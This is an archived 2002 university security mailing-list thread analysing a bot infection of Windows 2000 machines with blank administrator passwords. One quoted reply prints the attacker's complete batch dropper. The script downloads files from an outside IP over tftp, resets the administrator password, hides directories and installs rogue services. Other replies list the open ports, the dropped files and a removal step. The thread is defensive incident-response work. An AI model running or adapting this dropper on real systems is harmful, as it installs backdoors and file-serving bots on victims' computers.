[unisog] Re: Coordinated Scan

Terry Cavender terry.cavender at vanderbilt.edu
Thu Apr 4 00:12:10 GMT 2002


You may also want to read this and note the security warning at the bottom.

	http://www.firedaemon.com/

Seems like a good product.


--On Wednesday, April 03, 2002 9:03 AM -0800 Huba Leidenfrost <huba at uidaho.edu> wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> We fired off sample copies of what we saw here (as probably did many
> of you) to SOPHOS, NAV, & F-Secure.  F-Secure now has detection for
> this and I'm sure the others will follow.
>
> I haven't seen a conclusive writeup.  However it would appear that
> this is just another rendition of the global threat (GT Bot) as
> mentioned earlier (http://bots.lockdowncorp.com/gtbot.html).
> Although we still don't know exactly what the dropper was I'm
> inclined to believe that the reason was simply poor user habits in
> terms of surfing and password settings.  All the systems we saw
> hacked were 2000 Professional where the user had set their
> administrator password to nothing.
>
>    H  u  b  a
> - -
> HUBA LEIDENFROST           Systems Security Analyst
> huba at uidaho.edu     Information Technology Services
> University Of Idaho      TEL/FAX: 208.885.2126/7539
> http://www.its.uidaho.edu/info-security/runsafe.htm
>
> - -----Original Message-----
> From: Mark Newman [mailto:mnx at utk.edu]
> Sent: Wednesday, April 03, 2002 7:07 AM
> To: jeff_bollinger at unc.edu; Jeff Bollinger; Allen Chang
> Cc: unisog at sans.org; security at rescomp.berkeley.edu
> Subject: Re: [unisog] Re: Coordinated Scan
>
>
> Anyone found a conclusive writeup on this?
>
> Mark Newman
> University of Tennessee
>
> On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
>> More on this attack.  Here is the actual .bat file used by the
>> attacker which gives some great clues:
>>
>> ----
>>
>> @echo off
>> c:
>> cd c:\winnt\system32\vmn32
>> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
>> attrib +s +r +h
>> \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000 kill sxe*
>> kill temp.exe
>> del ..\2*.ocx
>> del ..\32*.ocx
>> del ..\temp2.exe
>> PATH=%PATH%;c:\winnt\system32
>> move firedaem.exe firedaemon.exe
>> del c:\winnt\system32\vmn32.exe
>> attrib *.* -r /s
>> attrib +s +h +r c:\winnt\system32\vmn32
>> attrib c:\winnt\system32\vmn32\asp +s +h
>> attrib c:\winnt\system32\vmn32\aspc +s +h
>> tftp -i 12.233.26.173 GET ir2.conf
>> c:\winnt\system32\vmn32\asp\ir.conf tftp -i 12.233.26.173 GET
>> xir.conf c:\winnt\system32\vmn32\aspc\ir.conf tftp -i 12.233.26.173
>> GET barm8.gif c:\winnt\system32\vmn32\barm8.gif attrib *.* -r /s
>> net user administrator changem
>> net share /delete ipc$
>> SET MXHOME=c:\winnt\system32\vmn32
>> SET MXBIN=c:\winnt\system32\vmn32
>> c:\winnt\system32\vmn32\firedaemon -i Ms32dll
>> "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe"
>> "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\firedaemon -i SVHOST
>> "c:\winnt\system32\vmn32\asp"
>> "c:\winnt\system32\vmn32\asp\SVHOST.EXE"
>> "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\firedaemon -i MSVC5
>> "c:\winnt\system32\vmn32\aspc"
>> "c:\winnt\system32\vmn32\aspc\SVHOST.EXE"
>> "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\services start Ms32dll
>> c:\winnt\system32\vmn32\services start SVHOST
>> c:\winnt\system32\vmn32\services start MSVC5
>> echo REGEDIT4  1>>root.reg
>> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >>
>> root.reg echo "restrictanonymous"="1" >> root.reg
>> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >>
>> root.reg echo "NTLM"="2" >> root.reg
>> regedit /S root.reg
>> del root.reg
>> services stop tlntsvr
>> services delete tlntsvr
>> services stop lmhosts
>> services start lmhosts
>> services start NtLmSsp
>> services stop PSEXESVC
>> services delete PSEXESVC
>>
>> Allen Chang wrote:
>> > Apologies if I break the thread...
>> >
>> > Here's my analysis of the compromised computers. First of all,
>> > this is not the Backdoor.darkIRC detected by antivirus programs.
>> > This backdoor is not detected by the latest NAV patterns.
>> >
>> > I'm guessing that these computer were compromised through the
>> > administrative share with no administrator password on Windows
>> > 2000.
>> >
>> > *A rouge lsass.exe (with a red u and a smaller green d icon) was
>> > installed as a service using firedaemon.exe (or firedaem.exe).
>> > You can check for it under Administrative Tools -> Services. The
>> > one on our hosts was called ms32dll *Several .tmp files and a
>> > rudl32.exe are dropped in the Startup folder but the .tmp  files
>> > don't seem to run.
>> > *Serve-U FTP, IRC and telnet servers are run on various ports.
>> > The IRC configurations(ir.con) seem to indicate that they are set
>> > up as XDCC file-serving bots.
>> >
>> > Judging from this, one should be able to remove the service with
>> > a "firedaemon -u ms32dll" This seems to close all the opened
>> > ports but I am unsure as to what other damage may have been done.
>> >
>> > On all the hosts, nmap found the following ports open:
>> > Port       State       Service
>> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
>> > 135/tcp    open        loc-srv <--svchost.exe
>> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
>> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of
>> > normal) 1025/tcp   open        listen <--mstask.exe (normal)
>> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor
>> > client)
>> >
>> > Running Vision 1.0 (www.foundstone.com) on the compromised
>> > computers yielded these additional ports and programs bound to
>> > them:
>> > 1029/tcp  <-- sxe5.tmp
>> > 1031/tcp <-- sxe5.tmp
>> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be
>> > confused with the other lsass.exe from MS
>> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
>> >
>> > According to vmn\ServUStartUpLog.txt (Not confirmed)
>> > 3112 <-- ftp
>> >
>> > Hidden? (Never seen by me)
>> > 99/tcp <-- Backdoor command shell?
>> >
>> > (**Files Found**)
>> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
>> > rudl32.exe
>> > sxe3.tmp
>> > sxe4.tmp
>> > sxe5.tmp
>> >
>> > Other files mentioned at
>> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
>> >
>> > @llen
>> > Network Security
>> > Office of Residential Computing
>> > UC Berkeley
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBPKs1w0pG2S0cMeJwEQLFlACg8TqRo7lO2jLMymLhvEME+CqROfEAoL1M
> 7H4fhOGU2CbFeKshjk8aZHHm
> =8+bO
> -----END PGP SIGNATURE-----
>



-----------------------------------------------------------------
Terry Cavender
Network Security Officer
Vanderbilt University
http://www.vanderbilt.edu/its/security
WK: 615-343-3494 Fx: 615-343-1605
terry.cavender at Vanderbilt.Edu



More information about the unisog mailing list